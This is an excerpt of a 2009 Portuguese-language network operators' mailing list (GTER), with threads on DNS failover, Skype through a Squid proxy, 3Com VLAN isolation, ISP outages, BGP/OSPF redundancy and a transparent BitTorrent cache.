humildimente pedir algumas id?ias, opini?es sobre a situa??o a seguir. Tenhos dois sites, distante uns 5km, ligados por um link de r?dio com boa velocidade (+-25Mpb/s). Estamos montando uma estrutura pra replica??o, onde pretendo manter a mesma estrutura de servidores em ambos lados. Tamb?m tenho em ambos os lados links sob demanda que podem atender minha necessidade. No entanto, pretendo manter um como principal e o segundo s? entrar em a??o quando o primeiro n?o mais estiver dispon?vel. Pensei em algo com DNS... um DNS com baixo ttl no site2 como prim?rio, apontando tudo pro site1 e em caso de falha de comunica??o, mudasse pra s? pr?prio. DNS secund?rio no site1, pra caso o site2 caia. Tenho automonia na configura??o do DNS de meus clientes, de forma posso apontar tudo pra meus sites. Estou no caminho certo? -- Jefferson B. Limeira Internexxus Tecnol?gica http://www.internexxus.com.br (44) 3029-3039 (44) 9911-1668 From stuntshell at gmail.com Fri Jun 26 00:58:23 2009 From: stuntshell at gmail.com (Jean Rousseau Franco) Date: Fri, 26 Jun 2009 00:58:23 -0300 Subject: [GTER] =?iso-8859-1?q?Virtua_n=E3o_acessa_v=E1rios_sites?= In-Reply-To: <011E245D38514877B146B8AAF2D6261B@ricardookh> References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <011E245D38514877B146B8AAF2D6261B@ricardookh> Message-ID: Sem problemas, DNS? 2009/6/25 Sergio Ricardo Marques > Boa tarde! > > Recebi v?rias reclama??es de clientes que n?o conseguem ver os seus > sites/e-mails, todos utilizando Net V?rtua. > Nas minhas duas conex?es, uma virtua e outra speedy, eu vejo normalmente. > Algu?m est? tendo o mesmo problema para acesso externo? Aqui eu n?o consigo > acessar o www.abusar.org e o www.wikipedia.org. > > Grato. > > Sergio. > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From billpp at gmail.com Fri Jun 26 00:16:44 2009 From: billpp at gmail.com (Flavio Junior) Date: Fri, 26 Jun 2009 00:16:44 -0300 Subject: [GTER] Layer7 x Skype In-Reply-To: References: Message-ID: <58aa8d780906252016w7b4ca1cbu610e88bf87aabc73@mail.gmail.com> Olha.. sinceramente nao sei te dizer se o skype vai funcionar, se o teu proxy nao permitir... Aqui eu tenho um cenario parecido, firewall em DROP e proxy em DENY.. So libero o que ? realmente necessario. A unica (e HORRIVEL) forma que consigo fazer o skype funcionar BEM (conectar nao basta, enviar mensagens sera sempre um problema) ? liberando no proxy a conexao HTTPS para IP's. Como citei, ? uma solu?ao horrivel, vai contra toda minha ideia de politica de DROP no proxy.. Mas mantenho meus relatorios sempre atualizados e vejo que na minha rede, ninguem ta abusando dessa "caracteristica" de acesso. At? por que ? complicado navegar em sites usando somente o IP, o site tem que permitir isso ou tu usar um "firebug" da vida pra ficar alteradno os hiperlinks, e ainda esse destino tem q estar disponivel pra HTTPS tambem. Bom, a linha ? a seguinte: squid.conf: acl whitelist url_regex -i "/etc/squid/whitelist.lst" # Impedindo o squidGuard de ser chamado para a whitelist redirector_access allow !whitelist !bannedsources http_access deny bannedsources !whitelist http_access allow whitelist /etc/squid/whitelist.lst: # Unica forma que encontrei de fazer o skype funcionar DECENTEMENTE foi: # Liberar conexoes SSL (porta 443) a destinos no formato IP. # Isso e horrivel! ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:443$ Mantive at? os comentarios originais ;) -- Fl?vio do Carmo J?nior aka waKKu 2009/6/18 Wagner Santos > Car at s, > > Tenho um firewall Linux com iptables, onde nossas pol?ticas padr?es s?o > todas DROP (INPUT, FORWARD e OUTPUT). Tudo funciona bem, exceto o Skype > (preciso que o Skype funcione para toda a rede). Tenho tudo devidamente > compilado e instalado por?m o Layer7 est? me retornado a seguinte mensagem: > > "layer7: couldn't get conntrack." > > J? fiz v?rias pesquisas mas n?o encontrei nenhuma solu??o, inclusive > pesquisei aqui na lista, mas n?o encontrei nada. > > Algu?m j? passou por isso? > > -- > Wagner Santos > 81 9127 9823 / 81 8781 9823 > > wagnerpaxs @NOSPAM gmail.com > wagner @NOSPAM dotlinux.net > > ICQ: 83709017 | Jabber: xwindow at jabber.org > > Linux User #408917 > DotLinux.Net - http://www.dotlinux.net/ > Debian-PE - > http://pe.debianbrasil.org/ > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From linosarlo at gmail.com Fri Jun 26 09:22:40 2009 From: linosarlo at gmail.com (Lino Silva) Date: Fri, 26 Jun 2009 09:22:40 -0300 Subject: [GTER] =?iso-8859-1?q?Redund=E2ncia_de_sites?= In-Reply-To: <1245988154.4a44453af2de6@webmail.internexxus.com.br> References: <1245988154.4a44453af2de6@webmail.internexxus.com.br> Message-ID: <8b388dda0906260522s37c37edckc4cc8d84d241e837@mail.gmail.com> Jefferson, De uma olhada no Anycast (RFC 3330), os grandes provedores estao usando essa t?cnica para fazer redund?ncia de DNSs. Bascamente voce colcoa o mesmo endere?o IP em quantos servidores quiser e quem decide como chegar em cada um ? o roteamento inter-dominio que voce tem na rede. Procura na NET que tem bastante material. Abra?os Lino 2009/6/26 Jefferson B. Limeira : > Boa Noite Senhores, > > ?Venho humildimente pedir algumas id?ias, opini?es sobre a situa??o a seguir. > Tenhos dois sites, distante uns 5km, ligados por um link de r?dio com boa > velocidade (+-25Mpb/s). Estamos montando uma estrutura pra replica??o, onde > pretendo manter a mesma estrutura de servidores em ambos lados. Tamb?m tenho em > ambos os lados links sob demanda que podem atender minha necessidade. No > entanto, pretendo manter um como principal e o segundo s? entrar em a??o quando > o primeiro n?o mais estiver dispon?vel. > ?Pensei em algo com DNS... um DNS com baixo ttl no site2 como prim?rio, > apontando tudo pro site1 e em caso de falha de comunica??o, mudasse pra s? > pr?prio. DNS secund?rio no site1, pra caso o site2 caia. Tenho automonia na > configura??o do DNS de meus clientes, de forma posso apontar tudo pra meus > sites. > ?Estou no caminho certo? > > -- > Jefferson B. Limeira > Internexxus Tecnol?gica > http://www.internexxus.com.br > (44) 3029-3039 > (44) 9911-1668 > > > > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From phazzi at gmail.com Fri Jun 26 09:31:57 2009 From: phazzi at gmail.com (Pedro Azzi) Date: Fri, 26 Jun 2009 09:31:57 -0300 Subject: [GTER] =?iso-8859-1?q?Virtua_n=E3o_acessa_v=E1rios_sites?= In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <011E245D38514877B146B8AAF2D6261B@ricardookh> Message-ID: Bom dia! Aqui eu consegui acessar os sites! Mas de acordo com a pergunta do Jean, os servidores de DNS que sao informados via DHCP nao estao resolvendo varios dominios tive que colocar na mao um terceiro DNS do virtua que consegui achar funcionando corretamente. ( 201.17.128.12) Aproveitando.. tenho acesso a uma rede da globalcrossing, e por incrivel que pareca pelo NETVIRTUA esta lentissimo, alguem passa pelo mesmo problema? Pelo que pude identificar a lentidao esta no lado da embratel. Anteciosamente, Pedro 2009/6/26 Jean Rousseau Franco > Sem problemas, DNS? > > 2009/6/25 Sergio Ricardo Marques > > > Boa tarde! > > > > Recebi v?rias reclama??es de clientes que n?o conseguem ver os seus > > sites/e-mails, todos utilizando Net V?rtua. > > Nas minhas duas conex?es, uma virtua e outra speedy, eu vejo normalmente. > > Algu?m est? tendo o mesmo problema para acesso externo? Aqui eu n?o > consigo > > acessar o www.abusar.org e o www.wikipedia.org. > > > > Grato. > > > > Sergio. > > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From charlestavares at gmail.com Fri Jun 26 09:48:26 2009 From: charlestavares at gmail.com (Charles Santos Tavares) Date: Fri, 26 Jun 2009 09:48:26 -0300 Subject: [GTER] RES: Port Vlan em Switch 3com In-Reply-To: <000001c9f629$649d6b20$2dd84160$@com> References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <4A43F404.9020304@jarruda.com> <000001c9f629$649d6b20$2dd84160$@com> Message-ID: <000601c9f65c$68279b20$3876d160$@com> Antonio Bom Dia, Se eu entendi bem sua d?vida... Estive olhando aqui no manual de um 3Com... a op??o "port isolate" atenderia esta sua necessidade. Fiz um teste usando a op??o "port isolate" p/ as portas 01 ? 24 menos a 25 e funcionou. Sds, Charles Santos Tavares. -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Antonio Junior Enviada em: Friday, June 26, 2009 3:43 AM Para: 'Grupo de Trabalho de Engenharia e Operacao de Redes' Assunto: [GTER] Port Vlan em Switch 3com Bom dia pessoal, Gostaria de saber se algu?m pode me ajudar. Pois estou quebrando a cabe?a para fazer o seguinte em um switch 3com l2: Porta 1 ? 24 n?o se comunicam entre si. E todas as portas se comunicam com a 25. Quero fazer apenas untagged vlan, pois quero apenas isolar as portas, e fazer com que eles se comuniquem apenas com o servidor na porta uplink. Se algu?m tiver alguma sugest?o de como fazer agrade?o, pois tentei fazer, por?m n?o consigo adicionar uma porta (uplink) em mais de 2 untagged vlans. Grande abra?o. Att, Antonio Junior -- gter list https://eng.registro.br/mailman/listinfo/gter From ilicilho at gmail.com Fri Jun 26 09:54:59 2009 From: ilicilho at gmail.com (Ilicilho Netto) Date: Fri, 26 Jun 2009 09:54:59 -0300 Subject: [GTER] Port Vlan em Switch 3com In-Reply-To: <000001c9f629$649d6b20$2dd84160$@com> References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <4A43F404.9020304@jarruda.com> <000001c9f629$649d6b20$2dd84160$@com> Message-ID: <97f74d980906260554u4bb3af08kee61a750a0124519@mail.gmail.com> N?o sei se a maneira correta de se fazer, mas quando utilizava sw 3com precisei fazer isto. Coloquei cada porta em uma vlan diferente como untagged e a porta 25/26 como vlan trunk (no 3com vem com nome diferente, que nao me lembro), mas funcionou perfeitamente. -- .'. Ilicilho Netto "... tamb?m os s?bios possuem cora??o tang?vel e podem, por vezes, usar da ci?ncia como meio de demonstrar impress?es sentimentais de que muitos n?o os julgam suscet?veis." Visconde de Taunay 2009/6/26 Antonio Junior > Bom dia pessoal, > > Gostaria de saber se algu?m pode me ajudar. Pois estou quebrando a cabe?a > para fazer o seguinte em um switch 3com l2: > > Porta 1 ? 24 n?o se comunicam entre si. > E todas as portas se comunicam com a 25. > > Quero fazer apenas untagged vlan, pois quero apenas isolar as portas, e > fazer com que eles se comuniquem apenas com o servidor na porta uplink. > > Se algu?m tiver alguma sugest?o de como fazer agrade?o, pois tentei fazer, > por?m n?o consigo adicionar uma porta (uplink) em mais de 2 untagged vlans. > > Grande abra?o. > > > Att, > > Antonio Junior > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From dinhofile at gmail.com Fri Jun 26 09:56:22 2009 From: dinhofile at gmail.com (Adriano Anselmo) Date: Fri, 26 Jun 2009 09:56:22 -0300 Subject: [GTER] =?iso-8859-1?q?Virtua_n=E3o_acessa_v=E1rios_sites?= In-Reply-To: References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <011E245D38514877B146B8AAF2D6261B@ricardookh> Message-ID: tambem estou tendo reclama?oes de clientes, usam virtua e que sites hospedados em servidores USA vou ver se consigo um ping e um tracert e envio. 2009/6/26 Jean Rousseau Franco > Sem problemas, DNS? > > 2009/6/25 Sergio Ricardo Marques > > > Boa tarde! > > > > Recebi v?rias reclama??es de clientes que n?o conseguem ver os seus > > sites/e-mails, todos utilizando Net V?rtua. > > Nas minhas duas conex?es, uma virtua e outra speedy, eu vejo normalmente. > > Algu?m est? tendo o mesmo problema para acesso externo? Aqui eu n?o > consigo > > acessar o www.abusar.org e o www.wikipedia.org. > > > > Grato. > > > > Sergio. > > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Adriano Anselmo From wagnerpaxs at gmail.com Fri Jun 26 09:56:42 2009 From: wagnerpaxs at gmail.com (Wagner Santos) Date: Fri, 26 Jun 2009 09:56:42 -0300 Subject: [GTER] Layer7 x Skype In-Reply-To: <58aa8d780906252016w7b4ca1cbu610e88bf87aabc73@mail.gmail.com> References: <58aa8d780906252016w7b4ca1cbu610e88bf87aabc73@mail.gmail.com> Message-ID: Fl?vio, Nessa tua solu??o tu consegue falar com quem est? fora da tua LAN? Pois aqui o Skype funciona bem para dentro da pr?pria LAN, j? fora, ele come?a listando quem est? online, depois o pessoal cai todinho, repentinamente volta a lista mas ao final, ningu?m fala com quem est? fora. 2009/6/26 Flavio Junior > Olha.. sinceramente nao sei te dizer se o skype vai funcionar, se o teu > proxy nao permitir... > > Aqui eu tenho um cenario parecido, firewall em DROP e proxy em DENY.. So > libero o que ? realmente necessario. > > A unica (e HORRIVEL) forma que consigo fazer o skype funcionar BEM > (conectar > nao basta, enviar mensagens sera sempre um problema) ? liberando no proxy a > conexao HTTPS para IP's. > > Como citei, ? uma solu?ao horrivel, vai contra toda minha ideia de politica > de DROP no proxy.. Mas mantenho meus relatorios sempre atualizados e vejo > que na minha rede, ninguem ta abusando dessa "caracteristica" de acesso. > At? > por que ? complicado navegar em sites usando somente o IP, o site tem que > permitir isso ou tu usar um "firebug" da vida pra ficar alteradno os > hiperlinks, e ainda esse destino tem q estar disponivel pra HTTPS tambem. > > Bom, a linha ? a seguinte: > squid.conf: > acl whitelist url_regex -i "/etc/squid/whitelist.lst" > # Impedindo o squidGuard de ser chamado para a whitelist > redirector_access allow !whitelist !bannedsources > http_access deny bannedsources !whitelist > http_access allow whitelist > > /etc/squid/whitelist.lst: > # Unica forma que encontrei de fazer o skype funcionar DECENTEMENTE foi: > # Liberar conexoes SSL (porta 443) a destinos no formato IP. > # Isso e horrivel! > ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:443$ > > > Mantive at? os comentarios originais ;) > > -- > > Fl?vio do Carmo J?nior aka waKKu > > > 2009/6/18 Wagner Santos > > > Car at s, > > > > Tenho um firewall Linux com iptables, onde nossas pol?ticas padr?es s?o > > todas DROP (INPUT, FORWARD e OUTPUT). Tudo funciona bem, exceto o Skype > > (preciso que o Skype funcione para toda a rede). Tenho tudo devidamente > > compilado e instalado por?m o Layer7 est? me retornado a seguinte > mensagem: > > > > "layer7: couldn't get conntrack." > > > > J? fiz v?rias pesquisas mas n?o encontrei nenhuma solu??o, inclusive > > pesquisei aqui na lista, mas n?o encontrei nada. > > > > Algu?m j? passou por isso? > > > > -- > > Wagner Santos > > 81 9127 9823 / 81 8781 9823 > > > > wagnerpaxs @NOSPAM gmail.com > > wagner @NOSPAM dotlinux.net > > > > ICQ: 83709017 | Jabber: xwindow at jabber.org > > > > Linux User #408917 > > DotLinux.Net - http://www.dotlinux.net/ > > Debian-PE - > > http://pe.debianbrasil.org/ > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Wagner Santos 81 9127 9823 / 81 8781 9823 wagnerpaxs @NOSPAM gmail.com wagner @NOSPAM dotlinux.net ICQ: 83709017 | Jabber: xwindow at jabber.org Linux User #408917 DotLinux.Net - http://www.dotlinux.net/ Debian-PE - http://pe.debianbrasil.org/ From casfre at gmail.com Fri Jun 26 10:07:17 2009 From: casfre at gmail.com (casfre at gmail.com) Date: Fri, 26 Jun 2009 10:07:17 -0300 Subject: [GTER] Port Vlan em Switch 3com In-Reply-To: <000001c9f629$649d6b20$2dd84160$@com> References: <4A416583.8070600@jarruda.com> <4A4282CC.2070508@jarruda.com> <4A43F404.9020304@jarruda.com> <000001c9f629$649d6b20$2dd84160$@com> Message-ID: Ol?, 2009/6/26 Antonio Junior : > Bom dia pessoal, > > Gostaria de saber se algu?m pode me ajudar. Pois estou quebrando a cabe?a > para fazer o seguinte em um switch 3com l2: > > Porta 1 ? 24 n?o se comunicam entre si. > E todas as portas se comunicam com a 25. > > Quero fazer apenas untagged vlan, pois quero apenas isolar as portas, e > fazer com que eles se comuniquem apenas com o servidor na porta uplink. > > Se algu?m tiver alguma sugest?o de como fazer agrade?o, pois tentei fazer, > por?m n?o consigo adicionar uma porta (uplink) em mais de 2 untagged vlans. Qual seria o switch? Se entendi bem (e aprendi com pessoas aqui da GTER), seu problema seria resolvido com private vlans (mas, como aprendiz, posso estar falando besteira). Se forem switches como: 3C16476CS, 3C16475CS, 3CBLSF26, 3CBLSF50 e 3CBLSG16 e eu n?o tiver entendido mal o manual, voc? s? conseguir? fazer isso usando 802.1q (porta 25 tagged). Se os switch for dessas linhas e voc? conseguir fazer o que pretende, por favor, me avise, pois eu tamb?m gostaria de fazer. :-) Obrigado. C?ssio From renato.diogo at gmail.com Fri Jun 26 11:15:04 2009 From: renato.diogo at gmail.com (Renato de Oliveira Diogo) Date: Fri, 26 Jun 2009 11:15:04 -0300 Subject: [GTER] Dominio yahoo Message-ID: <724d72960906260715m71a9d0c9qdf4527ac7e317a97@mail.gmail.com> Senhores bom dia alguem est? tendo dificuldades de acessar os dom?nios do yahoo? Na minha fila de e-mail todos os e-mail do yahoo est?o parados para entrega. Os sites n?o est?o sendo carregados (aparece o nome do site na barra de t?tulo, mas o site n?o carrega). Atenciosamente ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br From eschoedler at viavale.com.br Fri Jun 26 11:40:48 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Fri, 26 Jun 2009 11:40:48 -0300 Subject: [GTER] Dominio yahoo References: <724d72960906260715m71a9d0c9qdf4527ac7e317a97@mail.gmail.com> Message-ID: <247D114D0A3A4AB9AFA5E4AAE2D41D29@admgaz.com.br> J? foi discutudo na MASOCH-L. O Yahoo precisa de Domain Keys, basta implementar no seu servidor e ir? funcionar. Eduardo. ----- Original Message ----- From: "Renato de Oliveira Diogo" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Friday, June 26, 2009 11:15 AM Subject: [GTER] Dominio yahoo Senhores bom dia alguem est? tendo dificuldades de acessar os dom?nios do yahoo? Na minha fila de e-mail todos os e-mail do yahoo est?o parados para entrega. Os sites n?o est?o sendo carregados (aparece o nome do site na barra de t?tulo, mas o site n?o carrega). Atenciosamente ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br From eshine at gmail.com Fri Jun 26 16:18:15 2009 From: eshine at gmail.com (Shine) Date: Fri, 26 Jun 2009 16:18:15 -0300 Subject: [GTER] bgp failover In-Reply-To: References: <276fbe8b0906231526u560bd25excbace303e714eb01@mail.gmail.com> Message-ID: Errr... depende da caracter?stica de cada link. At? aqui, se estava assumindo dois links de caracter?sticas id?nticas. Nesse caso tanto ECMP como puro balanceamento per-packet/frame resolvem facilmente. Se temos algo com latencia, banda diferentes um balanceamento baseado em fluxo ? mais interessante. sd, Edgar 2009/6/25 Hitch Cock : > Tenho um ponto-a-ponto e uma vpn com a "Telec?mica", estava partindo para o > ospf com quagga, vai dar rock? > > 2009/6/24 BadTrip > >> O mais simples pra balancear eh configurar duas rotas est?ticas com mesma >> m?trica, uma apontando para cada link. >> >> Se forem links ponto a ponto melhor ainda beleza, se nao, crie um tunnel >> GRE >> em cima de cada link e aponte a rota para o tunnel, assim se o link falhar >> o >> tunnel cai e a rota perde a validade na tabela de roteamento, caso >> contr?rio, vc pode acabar mandando pacotes para um link com falhas. >> >> Abraco. >> >> 2009/6/24 Hitch Cock >> >> > Prezados, >> > >> > vou testar as solu??es propostas. Agrade?o a todos pelas informa??es. >> > >> > At, >> > Hitch >> > >> > 2009/6/23 Gustavo Santos >> > >> > > com ospf, vc vai poder fazer redundancia e balanceamento de rotas de >> > forma >> > > bem pratica. >> > > >> > > 2009/6/23 Itamar Reis Peixoto >> > > >> > > > s?o links ponto-a-ponto ? >> > > > >> > > > creio que existam outras alternativas melhores do que BGP >> > > > >> > > > >> > > > 2009/6/23 Hitch Cock : >> > > > > Prezados, >> > > > > >> > > > > algu?m teria um exemplo de configura??o do quagga em um ambiente >> bgp >> > de >> > > > > acordo com o senario abaixo >> > > > > >> > > > > ? ? ? ? ? |---------- LINK1 ------------| >> > > > > site-a ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?site-b >> > > > > ? ? ? ? ? |---------- LINK2 ------------| >> > > > > >> > > > > Tenho algumas redes que v?o pelo LINK1 e outras pelo LINK2. Caso >> > algum >> > > > dos >> > > > > links fique indispon?vel todo o tr?fego seja direcionado para o >> link >> > > > > dispon?vel. >> > > > > >> > > > > No site-a tenho as redes 192.168.100/24 192.168.200/24 172.16.1/24 >> e >> > no >> > > > > site-b tenho 192.168.101/24 192.168.201/24 10.4/16 10.5.0/24 >> > > > > >> > > > > O site-b sai para a internet atrav?s do site-a. >> > > > > >> > > > > Grato, >> > > > > Hitch >> > > > > -- >> > > > > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > > > > >> > > > >> > > > >> > > > >> > > > -- >> > > > ------------ >> > > > >> > > > Itamar Reis Peixoto >> > > > >> > > > e-mail/msn: itamar at ispbrasil.com.br >> > > > sip: itamar at ispbrasil.com.br >> > > > skype: itamarjp >> > > > icq: 81053601 >> > > > +55 11 4063 5033 >> > > > +55 34 3221 8599 >> > > > -- >> > > > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > > > >> > > -- >> > > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > > >> > -- >> > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > >> >> >> >> -- >> BrCaBadT >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From fabriciofx at gmail.com Fri Jun 26 10:42:02 2009 From: fabriciofx at gmail.com (=?ISO-8859-1?Q?Fabr=EDcio_Cabral?=) Date: Fri, 26 Jun 2009 10:42:02 -0300 Subject: [GTER] RES: Cache de BitTorrent In-Reply-To: <5e00a4be0906251332q744c0ebanad2895e4bf0cdf17@mail.gmail.com> References: <5e00a4be0906241105k569ed888j8fe2e6abdc07222c@mail.gmail.com> <86b352050906250557p1eb5dbbby587e8337dff8ae12@mail.gmail.com> <5e00a4be0906250801k996f3dby68e38b410a49c7fe@mail.gmail.com> <3A3FEDF0BB48484B8DB2DD8F901F119F@toledoPC> <5e00a4be0906251332q744c0ebanad2895e4bf0cdf17@mail.gmail.com> Message-ID: <4c2fd84e0906260642x58ad3265r7de08531a65bb722@mail.gmail.com> 2009/6/25 Provedor Bogus : > O problema n?o s?o os boxes. As m?quinas s?o baratas, tanto a m?quina de > cache quanto a m?quina > de conte?do podem ser m?quinas modestas. N?s compramos uma m?quina de > conte?do (Dell MD1000 + > PowerEdge) mais potente porque esper?vamos uma demanda diferente da que > tivemos, mas, ela foi > hiperdimensionada. A quest?o do custo da solu??o ser alto ? devido a necessidade de manuten??o (atualiza??o) constante do equipamento (software), que infelizmente, ? necess?ria. > O grande problema da solu??o ? o volume de tr?fego, que precisa ser > significativo. > Quanto maior o tr?fego, maior o hit ratio. > Um provedor que tenha 50 mbps de tr?fego Torrent n?o conseguir? mais que 2% > de hit ratio. :-( Concordo que com quanto maior o tr?fego, maior o hit ratio, mas ainda acho essa sua taxa de 2% *muito* pouco. Enquanto voc? n?o detalhar o funcionamento do seu sistema de cache, n?o poderemos opinar melhor sobre a raz?o de t?o baixo hit rate. > Eu esperava que o interesse dos provedores fosse at? maior. Pouca gente me > escreveu, talvez pela > situa??o de termos facilidade no PTT da Terremark ao inv?s do PTT-Metro, > mas, se a id?ia dos PTT-R > comecasse a virar realidade, isso seria com toda certeza, um grande > diferencial para o backbone brasileiro. Eu acho que a falta de interesse seja por diversos motivos: custos da solu??o, falta de know-how sobre funcionamento/manuten??o da solu??o e falta de um bom representante no brasil... []?s --fx From fgiusepponi at ig.com Fri Jun 26 10:19:59 2009 From: fgiusepponi at ig.com (Fernando Giusepponi) Date: Fri, 26 Jun 2009 10:19:59 -0300 Subject: [GTER] Switches H3C In-Reply-To: References: Message-ID: <1246022399.8458.8.camel@fgiusepponi-laptop> Senhores, algu?m j? esta trabalhado com a linha H3C da 3com? Pode dar a sua opini?o? grato Fernando Giusepponi Eng. Redes - IG On Fri, 2009-06-26 at 10:10 -0300, gter-request at eng.registro.br wrote: > ?Esta mensagem destina-se exclusivamente ao destinat?rio, podendo ser confidencial e estar sujeita ao sigilo profissional de comunica??o. Se voc? n?o ? o destinat?rio, fique advertido de que a divulga??o, distribui??o ou ci?ncia desta mensagem ? estritamente proibida. Caso tenha recebido esta mensagem por engano, por favor avise imediatamente seu remetente atrav?s de resposta por e-mail.? From provedorbogus at gmail.com Fri Jun 26 10:57:53 2009 From: provedorbogus at gmail.com (Provedor Bogus) Date: Fri, 26 Jun 2009 10:57:53 -0300 Subject: [GTER] Cache de BitTorrent In-Reply-To: <4c2fd84e0906251140ga93719bid1d1245eb2c8a081@mail.gmail.com> References: <5e00a4be0906241105k569ed888j8fe2e6abdc07222c@mail.gmail.com> <4c2fd84e0906251140ga93719bid1d1245eb2c8a081@mail.gmail.com> Message-ID: <5e00a4be0906260657s6593b906s5a394f14b319a108@mail.gmail.com> Fabr?cio, Estou comentando in-line, ok ? > respostas de outros interessados para formular nossa forma de > > funcionamento. > > Os aspecto jur?dico vai depender de como o seu cache funciona. Assim, > voc? poderia explicar *detalhamente* como ele funciona? O cache ? 100% transparente e foi desenvolvido usando TPROXY. Assim, a resposta para as requisi??es s?o feitas usando os endere?os IP dos peers que por ventura forem fornecedores da parte do arquivo solicitada e somente ela. O nosso cache n?o funciona como o Oversi que analisa o payload das requisi??es para os trackers e baixa junto com o peer da sua rede o mesmo conte?do para ent?o participar como sendo um seeder. Acho que essa forma seria juridicamente problem?tica. > > > Nossa m?quina de produ??o tem exatamente essa configura??o e custou > > cerca de R$ 2.800 com placa-m?e Supermicro. > > Cache "normalmente" consome mais disco e ram do que CPU. Cache P2P ? > um caso a parte, se for levado em considera??o de *como* voc? est? fazendo > o reconhecimento desse tr?fego. Se for an?lise de payload, com certeza ele > vai consumir muita CPU (obviamente, tamb?m depende da quantidade de > tr?fego). O tr?fego ? reconhecido atrav?s de an?lise de payload, mas, desenvolvemos um algoritmo que otimiza bem essa tarefa porque fica em kernel-mode. A m?quina supra-citada consegue processar 400 mbps com 30% de carga. N?o fizemos muitos testes de estresse porque consideramos essa performance muito razo?vel. Nosso plano n?o ? ter somente uma m?quina para toda a rede e sim dividir a carga entre duas ou tr?s m?quinas. H? a op??o de se colocar uma m?quina para toda a rede e outra em hot stand-by com Keepalived rodando para se ter redund?ncia. A parte de disco fica por conta da m?quina de conte?do que tem capacidade de processamento e subsistema de disco apropriados para essa tarefa. > > > > O problema atual ? que possu?mos pouco volume de tr?fego para > popular > > o cache e com isso o hit ratio alcan?ado fica em > > torno de 6%, sendo que o desej?vel ? qualquer coisa acima de 35%. > > N?o entendi direito essa dificuldade de popular o cache. Para o hit ratio > ficar > baixo assim, s? se houverem muitos usu?rios de P2P baixando conte?dos > diferentes (sempre novos) e poucos baixando conte?dos populares, o que soa > meio estranho. O cache de P2P difere em muito de um cache de Youtube, por exemplo. No Youtube, muitas pessoas acessam v?deos de, em m?dia, 8 mega. Um arquivo pequeno. No P2P, poucas pessoas baixam arquivos grandes, na nossa m?dia, 1,5 giga. Assim, o tempo para que o cache seja populado com apenas 3 arquivos ? muito maior. 1 arquivo de 1,5 giga d? pra guardar ~ 183 arquivos do Youtube. Qual das duas situa??es tem mais chance de ter um hit ? :-) A diversidade de conte?do tamb?m ? um problema, pois, dependem de buscas individuais dos clientes, diferente do Youtube em que v?deos s?o acessados por sites de blogs conhecidos (como o Kibeloco e o Buteco da Net) ou mesmo enviados como refer?ncia em e-mails. Eu nunca recebi um .torrent de algu?m sugerindo que eu baixasse para dar uma olhada. :-) Temos cerca de 300 mbps s? de tr?fego Torrent e isso ? insuficiente para gerar um bom hit ratio. > Quanto de disco o seu cache est? consumindo? Qual pol?tica de replacement > voc? est? utilizando? Como funciona *exatamente* o seu cache? Estamos com 5 TB ocupados e ainda estudando a pol?tica de replacement, mas, temos muito tempo para defin?-la j? que nem t?o cedo os 45 TB da m?quina ser?o ocupados. :-) Provavelmente ela ser? baseada em uma busca do INFOHASH nos sites mininova, isohunt e torrentz para definir a popularidade do Torrent e tamb?m a quantidade de vezes que ele foi baixado pelos nossos usu?rios. Atrav?s disso geraremos um rank que ser? usado para eliminar os arquivos de menor popularidade. Id?ias s?o bem-vindas. :-) From thomas at tcnet.com.br Fri Jun 26 11:34:46 2009 From: thomas at tcnet.com.br (Thomas Britis) Date: Fri, 26 Jun 2009 11:34:46 -0300 Subject: [GTER] DNSSEC and DNSCurve In-Reply-To: <31f2f4aa0906240920t43d0f3ddjf2f2f48087713e3a@mail.gmail.com> References: <31f2f4aa0906240920t43d0f3ddjf2f2f48087713e3a@mail.gmail.com> Message-ID: <4A44DC86.90407@tcnet.com.br> Bom dia, N?o h? ainda uma release de dnscurve para ser usado em produ??o. Mas, acredito que n?o deva demorar para ser publicado. Lauro Cesar de Oliveira wrote: > Sauda??es. > > Participei de um debate no FISL 10, DNSSEC X DNSCurve. > > Algum colega utilizando alguma implementa??o do DNSCurve? > > -- Thomas Storino Britis TCNet Informatica e Telecomunicacoes LTDA From stuntshell at gmail.com Fri Jun 26 10:41:27 2009 From: stuntshell at gmail.com (Jean Rousseau Franco) Date: Fri, 26 Jun 2009 10:41:27 -0300 Subject: [GTER] Latencia alta entre Embratel e Brasil Telecom In-Reply-To: <4A43CB9B.6040206@tecwave.com.br> References: <6bb5f5b10906251150s509f5f2bqb76f94b20928583d@mail.gmail.com> 